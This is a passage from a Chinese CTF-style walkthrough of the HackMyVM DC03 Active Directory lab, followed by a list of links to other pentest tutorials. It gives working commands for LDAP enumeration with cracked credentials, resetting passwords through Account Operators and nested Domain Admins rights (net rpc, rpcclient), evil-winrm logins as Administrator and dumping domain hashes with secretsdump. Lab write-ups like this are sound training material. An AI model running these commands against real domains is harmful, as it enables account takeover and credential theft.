等特权组。再看看管理员组有哪些用户，一个是Operators，一个是Administrator，两个用户属于超级管理员’ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b "DC=SOUPEDECODE,DC=LOCAL" "memberOf=CN=Domain Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL" sAMAccountName name从 LDAP 查询结果中，有几个关键线索表明 Operators 是自定义组而非 Windows 内置组：Windows 内置操作员组都有特定的前缀： Backup Operators Print Operators Server Operators Account Operators 而这里发现： 组名：Operators（没有前缀） 这不符合 Windows 内置组的命名规范 sAMAccountName 分析ldif# Operators, Users, SOUPEDECODE.LOCAL dn: CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL name: Operators sAMAccountName: Operators关键点： sAMAccountName: Operators（没有数字后缀） Windows 内置组通常有特定的 sAMAccountName 格式 例如内置的 Account Operators 的 sAMAccountName 是 Account Operators 另外# 内置组通常在 Builtin 容器中 dn: CN=Account Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL我们再来查看自定义组中有哪些用户ldapsearch -x -H ldap://192.168.215.25 -D "xkate578@SOUPEDECODE.LOCAL" -w 'jesuschrist' -b "DC=SOUPEDECODE,DC=LOCAL" "(&(objectClass=user)(memberOf=CN=Operators,CN=Users,DC=SOUPEDECODE,DC=LOCAL))" sAMAccountName name# Account Operators 不能重置这些直接组成员的密码： - 直接属于 Administrators 的用户 - 直接属于 Domain Admins 的用户 # 但可以重置这些用户的密码： - 通过组嵌套获得管理员权限的用户 - 属于自定义管理组的用户再不清楚，就是这个链路Domain Admins (域管理员组) ↑ 包含 Operators (自定义管理组) ↑ 包含 fbeth103 (普通用户) xkate578 (Account Operators) → 可以重置 fbeth103 密码开始修改密码（回家重装了靶机，ip变了）net rpc user password "fbeth103" "P@ssw0rd123" -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" -S 192.168.0.102 # 或者 [root@kali] /home/kali/DC03 ❯ rpcclient -U "xkate578" --password="jesuschrist" 192.168.56.126 ⏎ rpcclient $> setuserinfo2 fbeth103 23 "Pass1234!" rpcclient $> # 然后连接 evil-winrm -i 192.168.0.102 -u fbeth103 -p 'P@ssw0rd123'此时就已经得到了最后的root.txt内容它这个自定义既然组隶属于管理员组，那我们是不是能利用这个fbeth103用户去修改管理员的账号密码呢？现在试试┌──(root㉿kali)-[~] └─# net rpc user password "Administrator" "NewAdminPass123" -U "SOUPEDECODE.LOCAL/fbeth103%P@ssw0rd123" -S 192.168.0.102 ┌──(root㉿kali)-[~] └─# evil-winrm -i 192.168.0.102 -u Administrator -p 'NewAdminPass123' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami soupedecode\administrator 成功修改！都不需要去PTH（哈希传递攻击）了13.11 PTH攻击（hash传递）Secretdump获取域内hashimpacket-secretsdump 'SOUPEDECODE.LOCAL/fbeth103:P@ssw0rd123'@192.168.0.10213.12 工具推荐 ldapdomaindump除了ldapsearch工具之外，还有一个工具也可以看域内组织情况，叫做ldapdomaindumpldapdomaindump -u "SOUPEDECODE.LOCAL\fbeth103" -p P@ssw0rd123 192.168.0.102在生成的domain_groups.html中也能看到Operators属于Domain Admins组从这里也能看到fbeth103属于Operators组用这个工具更为方便13.13 DC03 域渗透总结本次 DC03 域渗透从外网打点开始，先通过 nmap 扫描确定目标为域控制器，开启 53、88、139、445、389 等关键端口。匿名登录 SMB 失败后，用 kerbrute 枚举到 charlie、administrator 等用户，爆破无果后通过 Responder 进行 LLMNR 投毒，捕获到 xkate578 的 NTLM 哈希并破解出密码。利用 xkate578（属 Account Operators 组）的账号管理权限，先创建影子账号并加入远程管理组，成功登录后枚举域内用户，发现自定义组 Operators 隶属于 Domain Admins，且包含用户 fbeth103。重置 fbeth103 密码并登录，利用其间接域管理员权限，成功修改 Administrator 密码，获取域控最高权限，最终找到 root.txt，全程未依赖复杂漏洞，主要通过权限嵌套与凭据复用推进。往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透